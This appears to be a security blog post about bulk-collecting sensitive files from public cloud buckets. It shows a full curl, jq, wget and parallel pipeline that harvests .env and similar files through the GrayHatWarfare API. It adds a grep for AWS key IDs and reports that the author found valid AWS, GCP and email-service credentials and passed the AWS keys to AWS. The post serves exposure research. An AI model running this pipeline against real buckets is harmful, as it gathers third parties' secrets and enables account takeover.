The last post already showed some ideas for gathering sensitive files from public cloud resources.

And yeah, it got worse…

To identify most of the stuff, we are almost exclusively using GrayHatWarfare.

I had the feeling that one FacePalm is not enough


Recently, on my Twitter (yes, it is Twitter, not X!) timeline, there was a tweet with GitHub dorks.
So far nothing really special, but it brought up the idea to also build some cloud storage dorks, and a few quick checks showed that the results are devastating.

Now you might say: not again, that's boring. That's okay and up to you; it is what it is.

GitHub dorks from @therceman

Thanks to a quick tip from @rootcathacking about simple OCR, we can use the PowerToys Text Extractor to avoid typing all those values.

Another interesting read offers a nice table of what ransomware groups are looking for.

Table with sensitive files

Build some dorks

To design some queries, we can either use the GUI or jump directly to the API.

API URLs only differ by a /api/v2 in the path and an Authorization header, so I will stick to the API version.

curl --request GET --url '' --header 'Authorization: Bearer #####' \
  | jq | grep "url" | cut -d ":" -f 2- | sed 's/,//g' \
  | xargs -i wget --no-check-certificate {}

As some companies / tools / people tend to use existing file extensions for other stuff, it might be a good idea to quickly check, e.g. via the file size, and exclude those buckets. Nobody wants several gigabytes of textures just because somebody named them x.env.
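A quick size check can be done with a HEAD request before downloading. Here is a minimal sketch; the helper names and the 1 MiB threshold are my own choices, and it assumes the bucket answers HEAD requests with a Content-Length header:

```shell
# content_length: pull the Content-Length value out of HTTP response headers on stdin.
content_length() {
  tr -d '\r' | awk 'tolower($1) == "content-length:" { v = $2 } END { print v }'
}

# keep_small URL: print the URL only if it reports no size or at most MAX_BYTES.
MAX_BYTES=${MAX_BYTES:-1048576}   # 1 MiB; real .env files are tiny
keep_small() {
  size=$(curl -sIL "$1" | content_length)
  if [ -n "$size" ] && [ "$size" -gt "$MAX_BYTES" ]; then
    return 1   # too big, likely mislabeled (e.g. textures named x.env)
  fi
  printf '%s\n' "$1"
}
```

Filtering the URL list through `keep_small` before the wget step avoids pulling the multi-gigabyte outliers.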

Another little trick is to add some stop words. Typically you can immediately skip files which contain words pointing to default files, like example, sample, or samples. Stop words are provided as ` -word` next to the keyword.
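The same idea also works locally on an already-collected URL list. A minimal stop-word filter could look like this (the word list is purely illustrative):

```shell
# strip_defaults: drop URLs that look like default/template files.
strip_defaults() {
  grep -viE '(example|sample|template|dummy)'
}
# usage: strip_defaults < env_urls.txt > env_urls.filtered.txt
```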

If you have an enterprise license for GrayHatWarfare, you can also use the regex search, which should improve the results even further.
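Without the enterprise tier, you can at least approximate a regex pass locally over the URL list. This sketch keeps only paths that literally end in .env (the pattern is my assumption about what you want to keep):

```shell
# only_dotenv: keep URLs whose path ends in ".env", optionally followed by a query string.
only_dotenv() {
  grep -E '\.env(\?.*)?$'
}
# usage: only_dotenv < env_urls.txt
```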


We need to determine the number of results, as we can get at most 1,000 entries per query.

curl --request GET --url ''  --header 'Authorization: Bearer #####' | jq '.meta.results'
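With the total from `.meta.results`, the number of 1,000-entry pages is a simple ceiling division. The result count below is a hypothetical value for illustration:

```shell
results=23500   # hypothetical value returned by .meta.results
limit=1000
# Ceiling division: round up so a partial last page still gets fetched.
pages=$(( (results + limit - 1) / limit ))
echo "$pages"
```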


So we would need 24 requests if we want all the data. We can either store the URLs in between or download directly; I would recommend storing them.

seq 0 24 | xargs -i curl --request GET --url '{}000&limit=1000'  --header 'Authorization: Bearer #####' | jq -r '.files[].url' >> env_urls.txt
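The `{}000` in the URL is plain string concatenation: xargs substitutes the page index from `seq 0 24`, so the start offset becomes 0, 1000, and so on up to 24000. The same offsets can be generated explicitly with a stepped seq:

```shell
# One start offset per request, stepping by the page size.
seq 0 1000 24000
```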

cat env_urls.txt | wc -l

So we now have a huge list which we can download. To speed things up a little, we are going to use GNU parallel.

cat env_urls.txt |  parallel --bar -P 10 wget --no-check-certificate {} 

Dirty All in One

seq 0 24 | xargs -i curl --request GET --url '{}000&limit=1000'  --header 'Authorization: Bearer #####' | jq -r '.files[].url' | parallel --bar -P 10 wget --no-check-certificate {}

The big run

I did the following queries and downloaded the files, excluding the noisy extensions png, webp, jpeg, html, mp3, mp4, js, css and svg via extensionsMode=exclude.

By doing some grepping and also using trufflehog, I found:

  • 185 AWS keys (AKIA#######), of which at least 45 were valid. Several of the valid tokens had access to IAM, and at least one belonged to a full administrator. I reported them to AWS.
  • 3 GCP service accounts
  • Several working OpenVPN configurations that lacked a password
  • Multiple valid API keys for Mailchimp, Mailgun and SendGrid
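The grepping for AWS keys follows the standard access key ID shape: AKIA plus 16 uppercase alphanumeric characters. A small helper (the directory and file arguments are up to you):

```shell
# find_aws_keys: extract unique AWS access key IDs from the given files.
find_aws_keys() {
  grep -hoE 'AKIA[0-9A-Z]{16}' "$@" 2>/dev/null | sort -u
}
# usage: find_aws_keys downloaded/*.env
```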


I tried to talk to AWS support about the leaked keys, which was quite difficult, as they did not understand that I am not concerned about my own account here. So I sent them 45 sets of AWS credentials; let's see what happens.